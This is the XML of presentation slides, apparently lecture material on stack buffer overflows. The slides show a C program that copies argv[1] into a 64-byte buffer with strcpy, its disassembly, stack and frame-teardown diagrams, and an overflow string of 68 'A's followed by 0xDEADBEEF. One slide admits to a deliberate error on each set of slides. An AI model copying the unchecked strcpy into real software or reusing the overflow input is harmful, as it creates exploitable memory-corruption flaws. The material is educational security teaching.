              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>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0x080483f4 &lt;+16&gt;:	lea    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-64(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u="sng" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0x080483f7 &lt;+19&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>,(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng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0x080483fa &lt;+22&gt;:	call   0x8048300 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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0x080483ff &lt;+27&gt;:	leave  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0x08048400 &lt;+28&gt;:	ret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74312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Arc 47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urved Connector 49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1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055154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“123456”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9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>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>include&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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main(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argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>**</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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[64]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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[1])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Dump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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0x080483e4 &lt;+0&gt;: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0x080483e5 &lt;+1&gt;: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0x080483e7 &lt;+3&gt;:	sub    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$72,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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0x080483ea &lt;+6&gt;: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12(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0x080483ed &lt;+9&gt;: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0x080483f0 &lt;+12&gt;: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>,4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>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0x080483f4 &lt;+16&gt;:	lea    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-64(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0x080483f7 &lt;+19&gt;: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u="sng" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0x080483fa &lt;+22&gt;:	call   0x8048300 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng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0x080483ff &lt;+27&gt;:	leave  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0x08048400 &lt;+28&gt;:	ret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928375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123456\0</a:t>
                      </a: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4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89068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8832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0xDEADBEEF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AAAA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AAAA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… (64 in total)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“A”x68 . “\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xBE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xDE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9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>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>include&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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main(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argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>**</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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[64]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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[1])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Dump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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0x080483e4 &lt;+0&gt;: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0x080483e5 &lt;+1&gt;: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0x080483e7 &lt;+3&gt;:	sub    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$72,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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0x080483ea &lt;+6&gt;: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12(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0x080483ed &lt;+9&gt;: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0x080483f0 &lt;+12&gt;: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>,4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>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0x080483f4 &lt;+16&gt;:	lea    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-64(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0x080483f7 &lt;+19&gt;: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u="sng" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0x080483fa &lt;+22&gt;:	call   0x8048300 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng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0x080483ff &lt;+27&gt;:	leave  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0x08048400 &lt;+28&gt;:	ret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61831" y="2221468"/>
            <a:ext cx="1367569" cy="1097464"/>
            <a:chOff x="5261831" y="2221468"/>
            <a:chExt cx="1367569" cy="1097464"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="TextBox 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5430453" y="2221468"/>
              <a:ext cx="1198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 dirty="0" smtClean="0"/>
                <a:t>corrupted</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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1831" y="2580217"/>
              <a:ext cx="1367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 dirty="0" smtClean="0"/>
                <a:t>overwritten</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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1831" y="2949600"/>
              <a:ext cx="1367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i="1" dirty="0" smtClean="0"/>
                <a:t>overwritten</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" i="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Arc 15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rame teardown—1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9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>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>include&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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main(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argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>**</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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[64]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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[1])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Dump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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0x080483e4 &lt;+0&gt;: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0x080483e5 &lt;+1&gt;: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0x080483e7 &lt;+3&gt;:	sub    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$72,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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0x080483ea &lt;+6&gt;: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12(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0x080483ed &lt;+9&gt;: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0x080483f0 &lt;+12&gt;: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>,4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>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0x080483f4 &lt;+16&gt;:	lea    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-64(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0x080483f7 &lt;+19&gt;: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0x080483fa &lt;+22&gt;:	call   0x8048300 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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=&gt; 0x080483ff </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;+27&gt;:	leave  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0x08048400 &lt;+28&gt;:	ret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30453" y="2221468"/>
            <a:ext cx="119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corrupted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61831" y="2580217"/>
            <a:ext cx="136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overwritten</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Folded Corner 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5835650" y="3810000"/>
            <a:ext cx="2819400" cy="1322308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3716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leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng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r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas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pop %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67580"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6521704" y="1479548"/>
          <a:ext cx="1461558" cy="1836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0xDEADBEEF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AAAA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8003947" y="2819400"/>
            <a:ext cx="1032104" cy="923330"/>
            <a:chOff x="7959243" y="3138173"/>
            <a:chExt cx="1032104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8229600" y="3138173"/>
              <a:ext cx="7617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 smtClean="0"/>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>and</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/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261831" y="2949600"/>
            <a:ext cx="136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overwritten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8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336393"/>
            <a:ext cx="8153400" cy="218521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 smtClean="0"/>
              <a:t>You will find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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t least one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>on each set of slides. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>:)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009446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2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2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rame teardown—2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9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>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>include&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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main(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argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>**</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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[64]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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[1])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Dump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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0x080483e4 &lt;+0&gt;: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0x080483e5 &lt;+1&gt;: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0x080483e7 &lt;+3&gt;:	sub    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$72,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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0x080483ea &lt;+6&gt;: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12(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0x080483ed &lt;+9&gt;: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0x080483f0 &lt;+12&gt;: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>,4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>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0x080483f4 &lt;+16&gt;:	lea    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-64(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0x080483f7 &lt;+19&gt;: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0x080483fa &lt;+22&gt;:	call   0x8048300 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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u="sng" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0x080483ff &lt;+27&gt;:	leave</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  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0x08048400 &lt;+28&gt;:	ret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72147"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6521704" y="1479548"/>
          <a:ext cx="1461558" cy="1468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/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>0xDEADBEEF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003947" y="2743200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430453" y="2221468"/>
            <a:ext cx="119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corrupted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61831" y="2580217"/>
            <a:ext cx="136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overwritten</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Folded Corner 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5835650" y="3810000"/>
            <a:ext cx="2819400" cy="1322308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3716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leave</a:t>
            </a:r>
          </a:p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mov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 %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,%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esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng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000" u="sng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6" name="Folded Corner 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5835650" y="3180100"/>
            <a:ext cx="2819400" cy="477500"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2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45720" rtlCol="0" anchor="t" anchorCtr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%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Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>AAAA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" i="1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528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rame teardown—3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6294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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>include&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int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main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int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argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>**</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean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char 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[64]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 err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy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err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf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dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[1])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/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Dump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>of assembler code for function main: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0x080483e4 &lt;+0&gt;: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0x080483e5 &lt;+1&gt;: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0x080483e7 &lt;+3&gt;:	sub    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$72,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%esp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0x080483ea &lt;+6&gt;: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12(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0x080483ed &lt;+9&gt;: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 smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>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0x080483f0 &lt;+12&gt;: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>,4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>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0x080483f4 &lt;+16&gt;:	lea    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-64(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>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0x080483f7 &lt;+19&gt;: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0x080483fa &lt;+22&gt;:	call   0x8048300 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;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0x080483ff &lt;+27&gt;:	leave  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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0x08048400 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;+28&gt;:	ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consola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0862"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6521704" y="1479548"/>
          <a:ext cx="1461558" cy="1101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003947" y="2389812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430453" y="2221468"/>
            <a:ext cx="119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corrupted</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Folded Corner 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5835650" y="3810000"/>
            <a:ext cx="2819400" cy="955000"/>
